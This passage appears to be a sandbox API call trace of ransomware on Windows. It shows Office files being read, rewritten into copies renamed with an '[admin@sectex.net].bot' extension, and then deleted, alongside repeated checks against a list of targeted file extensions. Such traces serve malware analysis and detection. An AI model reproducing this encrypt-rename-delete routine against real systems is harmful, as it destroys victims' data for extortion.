	[0149.906] ReadFile (in: hFile=0x384, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0xd0, lpOverlapped=0x0) returned 1
	[0149.906] WriteFile (in: hFile=0x3ec, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe0, lpOverlapped=0x0) returned 1
	[0149.907] ReadFile (in: hFile=0x384, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.907] WriteFile (in: hFile=0x3ec, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xf4, lpOverlapped=0x0) returned 1
	[0149.907] SetEndOfFile (hFile=0x3ec) returned 1
	[0149.908] CloseHandle (hObject=0x3ec) returned 1
	[0149.908] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.908] SetEndOfFile (hFile=0x384) returned 1
	[0149.912] CloseHandle (hObject=0x384) returned 1
	[0149.912] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.912] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_col.hxt")) returned 1
	[0149.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXT") returned 64
	[0149.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXT") returned 64
	[0149.913] lstrlenW (lpString=".doc") returned 4
	[0149.913] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0149.913] lstrlenW (lpString=".docx") returned 5
	[0149.913] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0149.913] lstrlenW (lpString=".pdf") returned 4
	[0149.913] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0149.913] lstrlenW (lpString=".xls") returned 4
	[0149.913] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0149.913] lstrlenW (lpString=".xlsx") returned 5
	[0149.913] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0149.913] lstrlenW (lpString=".ppt") returned 4
	[0149.913] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0149.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXT") returned 64
	[0149.913] lstrlenW (lpString=".zip") returned 4
	[0149.913] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0149.913] lstrlenW (lpString=".rar") returned 4
	[0149.913] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0149.913] lstrlenW (lpString=".bz2") returned 4
	[0149.913] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0149.913] lstrlenW (lpString=".7z") returned 3
	[0149.913] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0149.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXT") returned 64
	[0149.913] lstrlenW (lpString=".dbf") returned 4
	[0149.913] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0149.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXT") returned 64
	[0149.913] lstrlenW (lpString=".1cd") returned 4
	[0149.914] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0149.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXT") returned 64
	[0149.914] lstrlenW (lpString=".jpg") returned 4
	[0149.914] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0149.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXT") returned 64
	[0149.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXT") returned 64
	[0149.914] lstrlenW (lpString=".doc") returned 4
	[0149.914] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0149.914] lstrlenW (lpString=".docx") returned 5
	[0149.914] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0149.914] lstrlenW (lpString=".pdf") returned 4
	[0149.914] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0149.914] lstrlenW (lpString=".xls") returned 4
	[0149.914] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0149.914] lstrlenW (lpString=".xlsx") returned 5
	[0149.914] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0149.914] lstrlenW (lpString=".ppt") returned 4
	[0149.914] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0149.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXT") returned 64
	[0149.914] lstrlenW (lpString=".zip") returned 4
	[0149.914] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0149.914] lstrlenW (lpString=".rar") returned 4
	[0149.914] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0149.914] lstrlenW (lpString=".bz2") returned 4
	[0149.914] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0149.914] lstrlenW (lpString=".7z") returned 3
	[0149.914] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0149.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXT") returned 64
	[0149.914] lstrlenW (lpString=".dbf") returned 4
	[0149.914] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0149.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXT") returned 64
	[0149.915] lstrlenW (lpString=".1cd") returned 4
	[0149.915] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0149.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXT") returned 64
	[0149.915] lstrlenW (lpString=".jpg") returned 4
	[0149.915] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0149.915] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0149.915] lstrlenW (lpString="POWERPNT_F_COL.HXK") returned 18
	[0149.915] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.915] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=114) returned 1
	[0149.915] CloseHandle (hObject=0x384) returned 1
	[0149.915] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_f_col.hxk")) returned 0x20
	[0149.916] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.916] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.916] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.916] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.916] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0149.917] GetLastError () returned 0x0
	[0149.917] ReadFile (in: hFile=0x384, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x72, lpOverlapped=0x0) returned 1
	[0149.917] WriteFile (in: hFile=0x3ec, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0149.918] ReadFile (in: hFile=0x384, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.918] WriteFile (in: hFile=0x3ec, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xf8, lpOverlapped=0x0) returned 1
	[0149.918] SetEndOfFile (hFile=0x3ec) returned 1
	[0149.919] CloseHandle (hObject=0x3ec) returned 1
	[0149.919] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.919] SetEndOfFile (hFile=0x384) returned 1
	[0149.921] CloseHandle (hObject=0x384) returned 1
	[0149.921] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.921] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_f_col.hxk")) returned 1
	[0149.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_F_COL.HXK") returned 66
	[0149.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_F_COL.HXK") returned 66
	[0149.922] lstrlenW (lpString=".doc") returned 4
	[0149.922] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0149.922] lstrlenW (lpString=".docx") returned 5
	[0149.922] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0149.922] lstrlenW (lpString=".pdf") returned 4
	[0149.922] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0149.922] lstrlenW (lpString=".xls") returned 4
	[0149.922] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0149.922] lstrlenW (lpString=".xlsx") returned 5
	[0149.922] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0149.922] lstrlenW (lpString=".ppt") returned 4
	[0149.922] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0149.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_F_COL.HXK") returned 66
	[0149.922] lstrlenW (lpString=".zip") returned 4
	[0149.922] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0149.922] lstrlenW (lpString=".rar") returned 4
	[0149.922] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0149.923] lstrlenW (lpString=".bz2") returned 4
	[0149.923] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0149.923] lstrlenW (lpString=".7z") returned 3
	[0149.923] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0149.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_F_COL.HXK") returned 66
	[0149.923] lstrlenW (lpString=".dbf") returned 4
	[0149.923] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0149.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_F_COL.HXK") returned 66
	[0149.923] lstrlenW (lpString=".1cd") returned 4
	[0149.923] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0149.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_F_COL.HXK") returned 66
	[0149.923] lstrlenW (lpString=".jpg") returned 4
	[0149.923] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0149.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_F_COL.HXK") returned 66
	[0149.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_F_COL.HXK") returned 66
	[0149.923] lstrlenW (lpString=".doc") returned 4
	[0149.923] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0149.923] lstrlenW (lpString=".docx") returned 5
	[0149.923] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0149.923] lstrlenW (lpString=".pdf") returned 4
	[0149.923] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0149.923] lstrlenW (lpString=".xls") returned 4
	[0149.923] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0149.923] lstrlenW (lpString=".xlsx") returned 5
	[0149.924] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0149.924] lstrlenW (lpString=".ppt") returned 4
	[0149.924] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0149.924] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_F_COL.HXK") returned 66
	[0149.924] lstrlenW (lpString=".zip") returned 4
	[0149.924] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0149.924] lstrlenW (lpString=".rar") returned 4
	[0149.924] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0149.924] lstrlenW (lpString=".bz2") returned 4
	[0149.924] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0149.924] lstrlenW (lpString=".7z") returned 3
	[0149.924] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0149.924] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_F_COL.HXK") returned 66
	[0149.924] lstrlenW (lpString=".dbf") returned 4
	[0149.924] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0149.924] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_F_COL.HXK") returned 66
	[0149.924] lstrlenW (lpString=".1cd") returned 4
	[0149.924] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0149.924] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_F_COL.HXK") returned 66
	[0149.924] lstrlenW (lpString=".jpg") returned 4
	[0149.924] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0149.924] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0149.924] lstrlenW (lpString="POWERPNT_K_COL.HXK") returned 18
	[0149.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.925] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=113) returned 1
	[0149.925] CloseHandle (hObject=0x384) returned 1
	[0149.925] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_k_col.hxk")) returned 0x20
	[0149.925] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.925] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.925] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.926] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.926] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0149.926] GetLastError () returned 0x0
	[0149.926] ReadFile (in: hFile=0x384, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x71, lpOverlapped=0x0) returned 1
	[0149.927] WriteFile (in: hFile=0x3ec, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0149.928] ReadFile (in: hFile=0x384, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.928] WriteFile (in: hFile=0x3ec, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xf8, lpOverlapped=0x0) returned 1
	[0149.928] SetEndOfFile (hFile=0x3ec) returned 1
	[0149.928] CloseHandle (hObject=0x3ec) returned 1
	[0149.928] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.928] SetEndOfFile (hFile=0x384) returned 1
	[0149.931] CloseHandle (hObject=0x384) returned 1
	[0149.931] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.931] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_k_col.hxk")) returned 1
	[0149.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_K_COL.HXK") returned 66
	[0149.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_K_COL.HXK") returned 66
	[0149.932] lstrlenW (lpString=".doc") returned 4
	[0149.932] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0149.932] lstrlenW (lpString=".docx") returned 5
	[0149.932] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0149.932] lstrlenW (lpString=".pdf") returned 4
	[0149.932] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0149.932] lstrlenW (lpString=".xls") returned 4
	[0149.932] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0149.932] lstrlenW (lpString=".xlsx") returned 5
	[0149.932] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0149.932] lstrlenW (lpString=".ppt") returned 4
	[0149.932] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0149.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_K_COL.HXK") returned 66
	[0149.932] lstrlenW (lpString=".zip") returned 4
	[0149.932] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0149.932] lstrlenW (lpString=".rar") returned 4
	[0149.932] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0149.932] lstrlenW (lpString=".bz2") returned 4
	[0149.932] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0149.932] lstrlenW (lpString=".7z") returned 3
	[0149.932] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0149.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_K_COL.HXK") returned 66
	[0149.932] lstrlenW (lpString=".dbf") returned 4
	[0149.932] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0149.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_K_COL.HXK") returned 66
	[0149.932] lstrlenW (lpString=".1cd") returned 4
	[0149.933] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0149.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_K_COL.HXK") returned 66
	[0149.933] lstrlenW (lpString=".jpg") returned 4
	[0149.933] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0149.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_K_COL.HXK") returned 66
	[0149.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_K_COL.HXK") returned 66
	[0149.933] lstrlenW (lpString=".doc") returned 4
	[0149.933] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0149.933] lstrlenW (lpString=".docx") returned 5
	[0149.933] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0149.933] lstrlenW (lpString=".pdf") returned 4
	[0149.933] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0149.933] lstrlenW (lpString=".xls") returned 4
	[0149.933] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0149.933] lstrlenW (lpString=".xlsx") returned 5
	[0149.933] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0149.933] lstrlenW (lpString=".ppt") returned 4
	[0149.933] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0149.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_K_COL.HXK") returned 66
	[0149.933] lstrlenW (lpString=".zip") returned 4
	[0149.933] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0149.933] lstrlenW (lpString=".rar") returned 4
	[0149.933] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0149.933] lstrlenW (lpString=".bz2") returned 4
	[0149.933] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0149.933] lstrlenW (lpString=".7z") returned 3
	[0149.933] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0149.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_K_COL.HXK") returned 66
	[0149.933] lstrlenW (lpString=".dbf") returned 4
	[0149.933] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0149.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_K_COL.HXK") returned 66
	[0149.934] lstrlenW (lpString=".1cd") returned 4
	[0149.934] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0149.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_K_COL.HXK") returned 66
	[0149.934] lstrlenW (lpString=".jpg") returned 4
	[0149.934] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0149.934] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0149.934] lstrlenW (lpString="PPINTL.DLL") returned 10
	[0149.934] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ppintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.934] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=1284456) returned 1
	[0149.934] CloseHandle (hObject=0x384) returned 1
	[0149.935] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ppintl.dll")) returned 0x20
	[0149.935] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ppintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.935] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ppintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0149.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL") returned 58
	[0149.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL") returned 58
	[0149.935] lstrlenW (lpString=".doc") returned 4
	[0149.935] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0149.935] lstrlenW (lpString=".docx") returned 5
	[0149.935] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0149.935] lstrlenW (lpString=".pdf") returned 4
	[0149.935] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0149.935] lstrlenW (lpString=".xls") returned 4
	[0149.935] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0149.935] lstrlenW (lpString=".xlsx") returned 5
	[0149.935] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0149.935] lstrlenW (lpString=".ppt") returned 4
	[0149.935] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0149.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL") returned 58
	[0149.935] lstrlenW (lpString=".zip") returned 4
	[0149.935] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0149.935] lstrlenW (lpString=".rar") returned 4
